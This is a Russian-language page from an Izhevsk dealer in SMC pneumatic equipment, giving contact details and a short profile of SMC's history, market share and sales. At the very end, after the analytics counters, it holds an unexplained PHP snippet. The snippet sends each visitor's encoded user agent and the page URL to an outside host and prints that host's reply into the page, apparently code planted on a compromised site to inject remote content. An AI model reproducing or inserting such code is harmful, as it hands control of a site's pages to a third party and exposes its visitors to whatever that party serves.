г. Ижевск, ул. Совхозная, 1а
Схема проезда
8 (3412) 94-51-95
8 (3412) 94-51-96
Заказать звонок

Пневматическое
оборудование

Огромный выбор пневмооборудования для промышленной автоматизации объектов

Оставить заявку

О компании SMC

Компания SMC начала свою деятельность в 1959 году в Токио. Начав с производства промышленных фильтров, SMC за короткий срок стала мировым лидером в области пневматических технологий.

Высококачественные пневматические компоненты, выпускаемые SMC, применяются в самых современных разработках в сфере промышленной автоматизации.

SMC Corporation неизменно доминирует на японском рынке средств автоматизации, занимая более 61% рынка.

Производственные предприятия - 17 заводов - расположены по всей Японии. Сеть сбыта SMC в Японии состоит из 64 местных подразделений и 93 дистрибьюторов.

В Центре Исследований и Разработок в Цукубе работают более 1000 конструкторов и инженеров по технической поддержке

В Европе и Америке SMC Corporation входит в тройку ведущих производителей пневматических средств автоматизации.

На мировом рынке пневмоавтоматики SMC занимает более 33%, значительно опережая ближайших конкурентов, ежегодный объем продаж SMC Corporation составляет более 3.9 млрд. долларов.

Стабильность и перспективность компании подтверждает 49 позиция SMC в инновационном рейтинге журнала Forbes, при подсчете которого используются котировки акций компании, исходя из прогнозирования инвесторами будущего роста и увеличения прибыли, рыночная капитализация (более 10 млрд. долларов) и доля от капитализации, идущая на научно-исследовательские и технологические разработки.

Рейтинг@Mail.ru Яндекс.Метрика
$useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;